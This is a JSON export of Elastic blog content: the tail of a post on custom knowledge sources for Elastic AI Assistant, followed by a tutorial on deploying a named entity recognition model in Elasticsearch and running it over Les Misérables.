asked.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBelow is an example of that in action — we’ll use the assistant to ask about a specific process or technique highlighted in our threat reports and perform a follow-up check to see if we’ve been impacted by similar behavior:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse3c5af273a745936"}}},{"video":{"vidyard_uuid":"EnrhrecdTQ5vtgQbPmfK2S","_metadata":{"uid":"cs36bd778c58bba592"},"caption_l10n":"","shadow":false,"video_play_count":"","muted":false,"loop_video":true,"hide_controls":false,"looping_animation":true}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs792476ec42c7e7d9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThis one example clearly highlights the usefulness of having custom knowledge sources available to the assistant. And as we highlighted earlier, there are many other scenarios and examples of where custom knowledge sources can be useful.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFor more information on how to add different types of knowledge sources, you can refer to our \u003ca href=\"https://www.elastic.co/guide/en/security/current/ai-assistant-knowledge-base.html\" target=\"_self\"\u003edetailed documentation\u003c/a\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What’s next?","_metadata":{"uid":"csdd77490f164635b2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe expect to add the ability to use custom knowledge in our other AI features, such as \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Attack Discovery\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eAutomatic Import\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. We’ll also be making it easier to use existing \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/enterprise-search/current/connectors.html\"\u003e\u003cspan style='font-size: 12pt;'\u003esearch connectors\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to continuously import and synchronize knowledge across systems, such as GitHub, Confluence, Jira, ServiceNow, and many other systems.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eReady to try this out with your own data? Get started with a \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/registration\"\u003e\u003cspan style='font-size: 12pt;'\u003e14-day free trial\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e!\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4e37feaee5fc8960"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc28b29708aa9954f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs6cc83d4b5cf47b3a"}}}],"publish_date":"2024-11-13","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt2dce920e77dbdfbd","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-11-12T16:06:11.569Z","created_by":"bltb6c155cd84fc0c1a","file_size":"14627","filename":"15-brain_(1).jpeg","parent_uid":null,"tags":[],"title":"15-brain (1).jpeg","updated_at":"2024-11-12T16:06:11.569Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-13T15:00:00.676Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2dce920e77dbdfbd/67337cf3170171c4bef016a3/15-brain_(1).jpeg"},"title":"Enhance threat response with custom knowledge sources for Elastic AI Assistant","title_l10n":"Enhance threat response with custom knowledge sources for Elastic AI Assistant","updated_at":"2024-11-13T02:57:12.323Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-ai-assistant-custom-knowledge-sources","publish_details":{"time":"2024-11-13T15:00:00.608Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltecfaf12e755817a4","_version":27,"locale":"en-us","ACL":{},"abstract_l10n":"Using named entity recognition (NER) as an example, this blog describes the process for getting up and running using deep learning models for natural language processing (NLP) in Elasticsearch.","author":["bltf5e67aa275b15da9"],"category":["blte5cc8450a098ce5e"],"created_at":"2022-04-06T19:46:08.011Z","created_by":"blt3044324473ef223b70bc674c","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs32aec6d0f29fd880"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eAs part of our \u003ca href=\"/blog/how-to-deploy-natural-language-processing-nlp-getting-started\" target=\"_self\"\u003emulti-blog series on natural language processing (NLP)\u003c/a\u003e, we will walk through an example using a named entity recognition (NER) NLP model to locate and extract predefined categories of entities in unstructured text fields. Using a publicly available model, we will show you how to deploy that model to Elasticsearch, find named entities in text with the new _infer API, and use the NER model in an ingest pipeline to extract entities as documents are ingested into Elasticsearch.\u003c/p\u003e\u003cp\u003eNER models are useful for using natural language to extract entities like people, places, and organizations from full text fields.\u003c/p\u003e\u003cp\u003eIn this example we will run the paragraphs of the book \u003ca href=\"https://en.wikipedia.org/wiki/Les_Mis%C3%A9rables\" target=\"_self\"\u003eLes Misérables\u003c/a\u003e, through an NER model and use the model to extract the characters and locations from the text and visualize the relationships between them.\u003c/p\u003e"},{"title_l10n":"Deploying an NER model to Elasticsearch","_metadata":{"uid":"cs0481055660bb05a1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eFirst we need to select an NER model that can extract the names of the characters and locations from text fields. Fortunately there are a few NER models available on \u003ca href=\"http://huggingface.co\" target=\"_self\"\u003eHugging Face\u003c/a\u003e we can choose from, and checking the \u003ca href=\"https://www.elastic.co/guide/en/machine-learning/master/ml-nlp-model-ref.html#ml-nlp-model-ref-ner\" target=\"_self\"\u003eElastic documentation\u003c/a\u003e, we see one for an \u003ca href=\"https://huggingface.co/elastic/distilbert-base-uncased-finetuned-conll03-english\" target=\"_self\"\u003euncased NER model from Elastic\u003c/a\u003e to try out.\u003c/p\u003e\u003cp\u003eNow that we have selected the NER model to use, we can use Eland to install the model. In this example we will run the Eland command via a docker image, but first we must build the docker image by cloning the \u003ca href=\"https://github.com/elastic/eland\" target=\"_self\"\u003eEland\u003c/a\u003e GitHub repository and create a docker image of Eland on your client system:\u003c/p\u003e"}],"_metadata":{"uid":"cs3549522214587f08"}}},{"code":{"code":"git clone git@github.com:elastic/eland.git\ncd eland\ndocker build -t elastic/eland .\n","_metadata":{"uid":"cs0ce5d70cb5f00faf"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7917b287ef49f6ca"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eNow that our eland docker client is ready we can install the NER model by executing the \u003ccode\u003eeland_import_hub_model\u003c/code\u003e command in the new docker image with the following command:\u003c/p\u003e"}],"_metadata":{"uid":"csb4e9fd1e0c1fc658"}}},{"code":{"code":"docker run -it --rm elastic/eland \\\n eland_import_hub_model \\\n --url $ELASTICSEARCH_URL \\\n --hub-model-id elastic/distilbert-base-uncased-finetuned-conll03-english \\\n --task-type ner \\\n --start","_metadata":{"uid":"csabeea0ce3a0a42c6"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csab2af550d25c5201"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eYou will need to replace the ELASTICSEACH_URL with the URL for your Elasticsearch cluster. For authentication purposes you will need to include an administrator username and password in the URL in the format \u003cem\u003ehttps://username:password@host:port\u003c/em\u003e. For Elasticsearch Service, use port 9243.\u003c/p\u003e\u003cp\u003eSince we used the --start option at the end of the eland import command, Elasticsearch will deploy the model to all available machine learning nodes and load the model in memory. If we had multiple models and wanted to select which model to deploy, we could use Kibana's Machine Learning \u0026gt; Model Management user interface to manage the start and stopping of models.\u003c/p\u003e"}],"_metadata":{"uid":"cs1ff6791663d0e058"}}},{"title_text":{"title_text":[{"title_l10n":"Testing out the NER model","_metadata":{"uid":"cs507a6d69b00b3268"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eDeployed models can be evaluated using the new \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.0/infer-trained-model-deployment.html\" target=\"_self\"\u003e_infer\u003c/a\u003e API. The input is the string we wish to analyze. In the request below, \u003ccode\u003etext_field\u003c/code\u003e is the field name where the model expects to find the input, as defined in the model configuration. By default, if the model was uploaded via Eland, the input field is \u003ccode\u003etext_field\u003c/code\u003e.\u003c/p\u003e\u003cp\u003eTry this example in Kibana’s Dev Tools Console:\u003c/p\u003e"}],"_metadata":{"uid":"csafaa98927d865659"}}},{"code":{"code":"POST _ml/trained_models/elastic__distilbert-base-uncased-finetuned-conll03-english/deployment/_infer\n{\n \"docs\": [\n {\n \"text_field\": \"Hi my name is Josh and I live in Berlin\"\n }\n ]\n}\n","_metadata":{"uid":"cse3caaee9ae79f993"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs16f066a92308d1b6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eThe model found two entities: the person \"Josh\" and the location \"Berlin\".\u003c/p\u003e"}],"_metadata":{"uid":"cs97415c75f1abc018"}}},{"code":{"code":"{\n \"predicted_value\" : \"Hi my name is [Josh](PER\u0026Josh) and I live in [Berlin](LOC\u0026Berlin)\", \n \"entities\" : {\n \"entity\" : \"Josh\",\n \"class_name\" : \"PER\",\n \"class_probability\" : 0.9977303419824,\n \"start_pos\" : 14,\n \"end_pos\" : 18\n },\n {\n \"entity\" : \"Berlin\",\n \"class_name\" : \"LOC\",\n \"class_probability\" : 0.9992474323902818,\n \"start_pos\" : 33,\n \"end_pos\" : 39\n }\n ]\n}\n","_metadata":{"uid":"cs33282ab2267ddbfc"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs158738286d63d50a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ccode\u003epredicted_value\u003c/code\u003e is the input string in \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/plugins/8.0/mapper-annotated-text-usage.html\" target=\"_self\"\u003eAnnotated Text\u003c/a\u003e format, \u003ccode\u003eclass_name\u003c/code\u003e is the predicted class, and \u003ccode\u003eclass_probability\u003c/code\u003e indicates the level of confidence in the prediction. \u003ccode\u003estart_pos\u003c/code\u003e and \u003ccode\u003eend_pos\u003c/code\u003e are the starting and ending character positions of the identified entity.\u003c/p\u003e"}],"_metadata":{"uid":"cs74c241debfb81d93"}}},{"banner":{"reference":[{"uid":"blt05d957a5a4398c02","_content_type_uid":"banner"}],"_metadata":{"uid":"cs91c116cb56029163"}}},{"title_text":{"title_text":[{"title_l10n":"Adding the NER model to an inference ingest pipeline","_metadata":{"uid":"csc96185849a6877c7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eThe \u003ccode\u003e_infer\u003c/code\u003e API is a fun and easy way to get started, but it accepts only a single input and the detected entities are not stored in Elasticsearch. An alternative is to perform bulk inference on documents as they are ingested via an ingest pipeline with the \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.0/inference-processor.html\"\u003eInference processor\u003c/a\u003e.\u0026nbsp;\u003c/p\u003e\u003cp\u003eYou can define an ingest pipeline in the \u003ca href=\"https://www.elastic.co/guide/en/machine-learning/master/ml-nlp-inference.html#ml-nlp-inference-processor\"\u003eStack Management UI\u003c/a\u003e or configure it in Kibana Console; this one contains multiple ingest processors:\u003c/p\u003e"}],"_metadata":{"uid":"csfbe817753f159ce1"}}},{"code":{"code":"PUT _ingest/pipeline/ner\n{\n \"description\": \"NER pipeline\",\n \"processors\": [\n {\n \"inference\": {\n \"model_id\": \"elastic__distilbert-base-uncased-finetuned-conll03-english\",\n \"target_field\": \"ml.ner\",\n \"field_map\": {\n \"paragraph\": \"text_field\"\n }\n }\n },\n {\n \"script\": {\n \"lang\": \"painless\",\n \"if\": \"return ctx['ml']['ner'].containsKey('entities')\",\n \"source\": \"Map tags = new HashMap(); for (item in ctx['ml']['ner']['entities']) { if (!tags.containsKey(item.class_name)) tags[item.class_name] = new HashSet(); tags[item.class_name].add(item.entity);} ctx['tags'] = tags;\"\n }\n }\n ],\n \"on_failure\": [\n {\n \"set\": {\n \"description\": \"Index document to 'failed-\u003cindex\u003e'\",\n \"field\": \"_index\",\n \"value\": \"failed-{{{ _index }}}\"\n }\n },\n {\n \"set\": {\n \"description\": \"Set error message\",\n \"field\": \"ingest.failure\",\n \"value\": \"{{_ingest.on_failure_message}}\"\n }\n }\n ]\n}\n","_metadata":{"uid":"cs033a734d1ec4b9bc"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs71e2d762578a54fd"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eStarting with the \u003ccode\u003einference\u003c/code\u003e processor, the purpose of \u003ccode\u003efield_map\u003c/code\u003e is to map \u003ccode\u003eparagraph\u003c/code\u003e (the field to analyze in the source documents) to text_field (the name of the field the model is configured to use). \u003ccode\u003etarget_field\u003c/code\u003e is the name of the field to write the inference results to.\u003c/p\u003e\n\u003cp\u003eThe \u003ccode\u003escript\u003c/code\u003e processor pulls out the entities and groups them by type. The end result is lists of people, locations, and organizations detected in the input text. We are adding this painless script so that we can build visualizations from the fields that are created.\u003c/p\u003e\n\u003cp\u003eThe \u003ccode\u003eon_failure\u003c/code\u003e clause is there to catch errors. It defines two actions. First, it sets the \u003ccode\u003e_index\u003c/code\u003e meta field to a new value, and the document will now be stored there. Secondly, the error message is written to a new field: \u003ccode\u003eingest.failure\u003c/code\u003e. Inference can fail for a number of easily fixable reasons. Perhaps the model has not been deployed, or the input field is missing in some of the source documents. By redirecting the failed documents to another index and setting the error message, those failed inferences are not lost and can be reviewed later. Once the errors are fixed, reindex from the failed index to recover the unsuccessful requests.\u003c/p\u003e"}],"_metadata":{"uid":"cs002baa0982b6151d"}}},{"title_text":{"title_text":[{"title_l10n":"Selecting the text fields for Inference","_metadata":{"uid":"cscfd7e688e84d4733"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eNER can be applied to many datasets. As an example I've picked Victor Hugo’s classic 1862 novel \u003ccite\u003eLes Misérables\u003c/cite\u003e. You can upload the \u003ccite\u003eLes Misérables\u003c/cite\u003e paragraphs of our \u003ca href=\"https://github.com/grabowskit/nlp-data/blob/main/les-miserables-nd.json\" target=\"_self\"\u003esample json file\u003c/a\u003e using \u003ca href=\"https://www.elastic.co/guide/en/kibana/current/connect-to-elasticsearch.html#upload-data-kibana\" target=\"_self\"\u003eKibana's file upload\u003c/a\u003e feature. The text is split into 14,021 JSON documents each containing a single paragraph. Taking a random paragraph as an example:\u003c/p\u003e"}],"_metadata":{"uid":"cs3268ac2375d7ae1a"}}},{"code":{"code":"{\n \"paragraph\": \"Father Gillenormand did not do it intentionally, but inattention to proper names was an aristocratic habit of his.\",\n \"line\": 12700\n}\n","_metadata":{"uid":"cscf9f0db4ab10aabb"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csaa8ee285b75f143a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eOnce the paragraph is ingested through the NER pipeline, the resulting document stored in Elasticsearch is marked up with one identified person.\u003c/p\u003e"}],"_metadata":{"uid":"cs698a94af4898ab52"}}},{"code":{"code":"{\n \"paragraph\": \"Father Gillenormand did not do it intentionally, but inattention to proper names was an aristocratic habit of his.\",\n \"@timestamp\": \"2020-01-01T17:38:25\",\n \"line\": 12700,\n \"ml\": {\n \"ner\": {\n \"predicted_value\": \"Father [Gillenormand](PER\u0026Gillenormand) did not do it intentionally, but inattention to proper names was an aristocratic habit of his.\",\n \"entities\": [{\n \"entity\": \"Gillenormand\",\n \"class_name\": \"PER\",\n \"class_probability\": 0.9806354093873283,\n \"start_pos\": 7,\n \"end_pos\": 19\n }],\n \"model_id\": \"elastic__distilbert-base-cased-finetuned-conll03-english\"\n }\n },\n \"tags\": {\n \"PER\": [\n \"Gillenormand\"\n ]\n }\n}\n","_metadata":{"uid":"csd25e57523000555d"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs530bdc4d73376955"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eA tag cloud is a visualization that scales words by the frequency at which they occur and is the perfect infographic for viewing the entities found in \u003ccite\u003eLes Misérables\u003c/cite\u003e. Open Kibana and create a new aggregation-based visualization and then pick Tag Cloud. Select the index containing the NER results and add a terms aggregation on the \u003ccode\u003etags.PER.keyword\u003c/code\u003e field.\u003c/p\u003e"}],"_metadata":{"uid":"cs760f9db0898253f4"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"bltc450643fc30ff5fc","ACL":{},"content_type":"image/png","created_at":"2022-04-06T19:42:58.855Z","created_by":"blt3044324473ef223b70bc674c","file_size":"263766","filename":"nlp-getting-started-part2-les-miserables-entities-tag-cloud.png","parent_uid":null,"tags":[],"title":"nlp-getting-started-part2-les-miserables-entities-tag-cloud.png","updated_at":"2022-04-06T19:42:58.855Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-10-27T17:50:49.658Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc450643fc30ff5fc/624ded42c674a505586e2cb2/nlp-getting-started-part2-les-miserables-entities-tag-cloud.png"},"_metadata":{"uid":"cs4e74a86778b545bb"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs09b081c69ba17508"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eIt is easy to see from the visualization that Cosette, Marius, and Jean Valjean are the most frequently mentioned characters in the book.\u003c/p\u003e"}],"_metadata":{"uid":"cs9374cec416bac5a5"}}},{"title_text":{"title_text":[{"title_l10n":"Tuning the deployment","_metadata":{"uid":"cs14827f6d31e6c027"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eReturning to the Model Management UI, under Deployment stats you will find the \u003cstrong\u003eAvg Inference Time\u003c/strong\u003e. This is the time measured by the native process to perform inference on a single request. When \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/master/start-trained-model-deployment.html\" target=\"_self\"\u003estarting a deployment\u003c/a\u003e there are two parameters that control how CPU resources are used: inference_threads and model_threads.\u003c/p\u003e\u003cp\u003einference_threads is the number of threads used to run the model per request. Increasing inference_threads directly reduces average inference time. The number of requests that are evaluated in parallel is controlled by model_threads. This setting will not reduce average inference time but increases throughput.\u003c/p\u003e\u003cp\u003eIn general, tune for latency by increasing the number of inference_threads and increase throughput by raising the number of model_threads. Both the settings default to one thread, so there is plenty of performance to be gained by modifying them. The effect is demonstrated using the NER model.\u003c/p\u003e\u003cp\u003eTo change one of the thread settings, the deployment must be stopped and restarted. The ?force=true parameter is passed to the stop API because the deployment is referenced by an ingest pipeline which would normally prevent stopping.\u003c/p\u003e"}],"_metadata":{"uid":"cs44c50808a177e085"}}},{"code":{"code":"POST _ml/trained_models/elastic__distilbert-base-uncased-finetuned-conll03-english/deployment/_stop?force=true\n","_metadata":{"uid":"cs3eaf78fee0cbc91b"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs28b5484a9b123ba5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eAnd restart with four inference threads. Average inference time is reset when the deployment is restarted.\u003c/p\u003e"}],"_metadata":{"uid":"cs764ab92f6b05d719"}}},{"code":{"code":"POST _ml/trained_models/elastic__distilbert-base-uncased-finetuned-conll03-english/deployment/_start?inference_threads=4","_metadata":{"uid":"csd6bd6c7bbf546205"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs38d28115a53b72b2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eWhen processing the \u003ccite\u003eLes Misérables\u003c/cite\u003e paragraphs, average inference time falls to 55.84 milliseconds per request compared to 173.86 milliseconds for one thread.\u003c/p\u003e"}],"_metadata":{"uid":"cscf33055186b7a9cf"}}},{"title_text":{"title_text":[{"title_l10n":"Learning more and trying it out","_metadata":{"uid":"cs5ee1ce81e831dd28"},"header_style":"H2","paragraph_l10n":"\u003cp\u003eNER is just one of the NLP tasks ready to use now. Text classification, zero shot classification and text embeddings are also available. More examples can be found in the NLP \u003ca href=\"https://www.elastic.co/guide/en/machine-learning/8.0/ml-nlp.html\" target=\"_self\"\u003edocumentation\u003c/a\u003e along with a by-no-means-exhaustive \u003ca href=\"https://www.elastic.co/guide/en/machine-learning/8.0/ml-nlp-model-ref.html\" target=\"_self\"\u003elist of models\u003c/a\u003e deployable to the Elastic Stack.\u003c/p\u003e\u003cp\u003eNLP is a major new feature in the Elastic Stack for 8.0 with an exciting roadmap. Discover new features and keep up with the latest developments by building your cluster in Elastic Cloud. Sign up for a \u003ca href=\"https://cloud.elastic.co/registration\" target=\"_self\"\u003efree 14-day trial\u003c/a\u003e today and try the examples in this blog.\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003ch4\u003eIf you want more NLP reads:\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/how-to-deploy-nlp-text-embeddings-and-vector-search\" target=\"_blank\"\u003eHow to deploy NLP text embeddings and vector search\u2028\u2028\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/how-to-deploy-nlp-sentiment-analysis-example\" target=\"_blank\"\u003eHow to deploy NLP sentiment analysis\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/how-to-deploy-natural-language-processing-nlp-getting-started\" target=\"_blank\"\u003eHow to deploy natural language processing: Getting started\u2028\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs9cab90fbdd895489"}}}],"publish_date":"2022-05-20","sanity_migration_complete":false,"seo":{"seo_title_l10n":"How to deploy NLP: Named entity recognition (NER) example","seo_description_l10n":"Using named entity recognition (NER) as an example, this blog describes the process for getting up and running using deep learning models for natural language processing (NLP) in Elasticsearch.","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blta3fd0168b354a680","ACL":{},"created_at":"2023-11-06T21:50:30.740Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elk-elastic-stack","label_l10n":"ELK/Elastic Stack","tags":[],"title":"ELK/Elastic Stack","updated_at":"2024-03-12T21:21:08.589Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-03-12T21:21:14.279Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt8b37b4b3ec0fe838","ACL":{},"created_at":"2020-06-17T03:36:06.107Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2020-06-17T03:36:06.107Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.315Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","title":"Natural Language Processing (NLP)","label_l10n":"Natural Language Processing (NLP)","keyword":"natural-language-processing","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt97696fc6e9921c30","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:43:16.119Z","updated_at":"2023-11-06T20:43:16.119Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:23:24.704Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt9149a5fda79fd708","ACL":{},"created_at":"2023-11-06T20:37:49.356Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"deployment","label_l10n":"Deployment","tags":[],"title":"Deployment","updated_at":"2023-11-06T20:37:49.356Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.169Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt03343e31035d9e73","created_by":"bltd9765be97bbed20c","updated_by":"bltd9765be97bbed20c","created_at":"2023-05-11T16:19:15.142Z","updated_at":"2023-05-11T16:19:15.142Z","content_type":"image/png","file_size":"135153","filename":"illustration-campaign-ansof-1680x980.png","title":"illustration-campaign-ansof-1680x980.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-05-11T16:20:52.502Z","user":"bltd9765be97bbed20c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt03343e31035d9e73/645d15830830e25a5ced06de/illustration-campaign-ansof-1680x980.png"},"title":"How to deploy NLP: Named entity recognition (NER) example","title_l10n":"How to deploy NLP: Named entity recognition (NER) 